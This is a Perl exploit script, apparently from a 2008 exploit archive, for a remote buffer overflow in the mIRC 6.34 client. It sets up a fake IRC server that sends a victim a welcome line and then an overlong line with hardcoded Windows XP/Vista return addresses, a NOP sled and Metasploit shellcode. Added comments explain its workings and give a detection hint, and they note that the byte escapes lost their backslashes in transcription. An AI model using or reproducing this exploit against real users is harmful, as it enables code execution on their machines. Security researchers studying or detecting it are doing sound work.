
# Title : mIRC 6.34 Remote Buffer Overflow Exploit
# Published : 2008-10-04
# Author : SkD


#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------



use IO::Socket;

# Usage guard: print the banner and stop when the second argument is absent
# or false.  "0" is false in Perl, so the example invocation shown in the
# banner itself ("6667 0") is rejected by this very check.  (As transcribed,
# the newline escapes appear as a literal "n".)
unless ($ARGV[1]) {
    my @banner = (
        "n[x] mIRC 6.34 Remote Buffer Overflow Exploitn",
        "[x] Exploit by SkD (skdrat@ hotmail.com)nn",
        "[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>n[x] Example: mirc_exp.pl 6667 0nn",
    );
    print $_ for @banner;
    exit;
}


while(1)
{
# Serve one client per pass, then loop and listen again.  From a defender's
# view this is a fake IRC server: it waits for an IRC client to connect to it
# (LocalAddr is 127.0.0.1, so as written only clients on the same host can
# reach it), greets the client, then sends one oversized line.
#
# The listener is a block-scoped lexical, so it is released at the end of
# each pass; nothing sets ReuseAddr, so re-binding the same port immediately
# may fail, and the bare `die` below reports no reason.  There is no
# `use strict`/`use warnings` in this file, and $s and the $overflow/$eip*
# variables below are package globals rather than lexicals.

my $sock=new IO::Socket::INET (
Listen    => 1,

LocalAddr => '127.0.0.1',

LocalPort => $ARGV[0],

Proto     => 'tcp');  

# No message: a bind failure only shows the script name and line number.
die unless $sock;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com 
# NOTE(review): in this transcription the backslashes of the \x escapes
# appear to be missing, so in Perl double quotes these literals are plain
# ASCII text (e.g. "x2b"), not the bytes the comment above describes.  The
# same applies to every "x.." literal further down.
my $shellcode =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e".
"x95x97xf1x83xebxfcxe2xf4xe2x7dxd3xf1x1ex95x1cxb4".
"x22x1exebxf4x66x94x78x7ax51x8dx1cxaex3ex94x7cxb8".
"x95xa1x1cxf0xf0xa4x57x68xb2x11x57x85x19x54x5dxfc".
"x1fx57x7cx05x25xc1xb3xf5x6bx70x1cxaex3ax94x7cx97".
"x95x99xdcx7ax41x89x96x1ax95x89x1cxf0xf5x1cxcbxd5".
"x1ax56xa6x31x7ax1exd7xc1x9bx55xefxfdx95xd5x9bx7a".
"x6ex89x3ax7ax76x9dx7cxf8x95x15x27xf1x1ex95x1cx99".
"x22xcaxa6x07x7exc3x1ex09x9dx55xecxa1x76x65x1dxf5".
"x41xfdx0fx0fx94x9bxc0x0exf9xf6xf6x9dx7dx95x97xf1";

print "[x] Listening on port ".$ARGV[0]."..rn";
# Blocks until a client connects.  $s is a global (no `my`), overwritten on
# every pass and never closed explicitly.
$s=$sock->accept();
print "[x] Got a user!rn";
# Fixed-length filler plus the author's chosen return addresses for the two
# Windows builds named in the trailing comments; $ARGV[1] selects the pair
# below.  As transcribed, "x41" x 307 is 307 copies of the three-character
# text "x41", not 307 bytes of 0x41.
$overflow = "x41" x 307;
$overflow2 = "B" x 12;
$eip_vista = "x66x1cxc2x76";    #Normaliz.DLL pop pop ret
$eip2_vista = "xd3xdbx54x77";   #MSFCT.DLL jmp esp
$eip_xpsp3 = "xd1xfbx92x77";    #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
$eip2_xpsp3 = "xb7x87x9dx77";   #SETUPAPI.DLL 0x779D87B7 jmp esp
$addr = "xb5xb5xfdx7f"; 
$nop_sled = "x90" x 4;
$jmp = "xEBx03xFFxFF";

print "[x] Sending packets..rn";

# First line is an IRC 001 numeric so the client treats this as a server
# welcome; the one-second sleep gives the client time to process it before
# the long second line arrives.  Neither print to $s is checked for failure.
# Detection hint: a "server" whose line right after the 001 welcome is
# hundreds of bytes of repeated filler followed by " PRIVMSG" is not normal
# IRC traffic and is easy to match on the wire or in a client's raw log.
print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wowrn";
sleep(1);
# Numeric comparison against a string literal (nothing here would warn about
# it): 1 selects the XP SP3 addresses, any other value the Vista ones.  The
# usage text says "2 for Vista" but its own example passes 0, which the
# argument guard at the top of the script rejects as a missing argument.
if($ARGV[1] == "1"){
print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG  wow : /FINGER wow.rn";
}else{
print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG  wow : /FINGER wow.rn";
}
print "[x] Check it out!rn";
}

# www.Syue.com [2008-10-04]